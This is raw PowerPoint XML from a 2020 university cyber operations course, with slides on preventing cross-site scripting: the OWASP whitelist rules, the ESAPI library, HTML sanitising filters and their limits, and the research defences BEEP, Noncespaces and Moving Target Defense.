              <a:t>CIS4930/CIS5930 Practical Cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DFDCB7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Operstions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DFDCB7"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Fundamentals 2020</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124947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Whitelist Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One way to prevent XSS attacks is to treat an HTML page as a template </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>with slots </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for untrusted data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Moving </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>untrusted data from slots in the template is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>not allowed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. This is a whitelist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>approach that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>denies everything that is not specifically allowed.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Given </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>way browsers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>parse HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>slot may have different security rules. When putting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>untrusted data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>slots these </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>rules must be adhered to. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in slots is not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>allowed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>break out of a slot into a context that allows code execution. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3962891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7620000" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Whitelist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Model</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The OWASP Prevention Cheat Sheet list proposes 5 Rules:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1524000"/>
            <a:ext cx="8001000" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Rule </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> uses an ``escape before inserting untrusted data'' methodology </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>inside normal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>tags.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>ule </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> extends this approach to include typical attribute values like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: width</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, name, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>value. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Rule </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> deals with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> code, with the only allowed untrusted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>data inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>quoted data values. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Rule </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> extends this to allow for untrusted data in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>style sheets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>or style tags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Rule </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> allows untrusted values into HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>values.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>There </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>are also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Rules 6,7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>with sanitized HTML markups that use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>a designated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Library</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Rule 7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> that prevents DOM-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>XSS</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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2788411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458200" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>OWASP Enterprise Security API (ESAPI)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>This is an open source security web application interface, that works on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>a whitelist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>using: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set of security control interfaces </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A reference </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>implementation for each security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Provision </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for optional customized implementation </a:t>
            </a:r>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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2677420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458200" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>HTML defense (sanitizing) filters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1600200"/>
            <a:ext cx="8229600" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>This involves an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>HTML-encoding application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>in which key characters needed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>deliver an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>XSS attack are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>encoded (e.g.,  ``&lt;'' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>becomes  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>``$&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1" smtClean="0"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>''; and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>``&gt;'' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>becomes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>``$&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1" smtClean="0"/>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>;'',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>Unfortunately </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>a determined XSS attacker can bypass such filters:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>e.g., if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>the data is being inserted directly into an existing script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>, one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>may not need to employ any HTML tag characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>; or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>if the application is removing script tags from the input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>, one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>may be able to use a different tag with a suitable event handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>list of XSS attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>that can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>be used to bypass certain XSS defensive filters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>that shows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>that input filtering is an incomplete defense for XSS is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>available from the </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>    OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>XSS Filter Evasion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>Cheat Sheet  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>  https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>www.owasp.org/index.php/XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300"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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1457745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US" dirty="0"/>
              <a:t>Attack Code discrimination</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="8153400" cy="5562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>includes three technologies: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" dirty="0" smtClean="0"/>
              <a:t>BEEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" dirty="0" err="1"/>
              <a:t>Noncespaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" dirty="0"/>
              <a:t>Moving Target  Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>offer a  certain degree of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>protection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" dirty="0" smtClean="0"/>
              <a:t>BEEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>, allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>  blocks in a whitelist to be executed on client  browsers to prevent XSS attacks.  Before deploying the web application, BEEP calculates the hash of all  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t> blocks  and generates a whitelist that is embedded in the web application from XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Noncespace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>generates a random XML namespace for each XHTML document requested by   the user,   and modifies all trusted XHTML tags in the document with symbols in the   namespace.   Only properly named XHTML elements can be executed.   In order to implement this method,   the client web browser must be modified, or a web proxy placed in   front of it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" dirty="0" smtClean="0"/>
              <a:t>Moving </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" dirty="0"/>
              <a:t>Target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" dirty="0" smtClean="0"/>
              <a:t>Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>adds a random attribute to each unsafe element in the web application  to distinguish between the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t> code in the web application and the  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>  code injected by attackers.  A security check function is used to verify the random attribute,  and if there is no random attribute or the attribute value is not  correct  then the execution of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t> code will be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>prevented.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
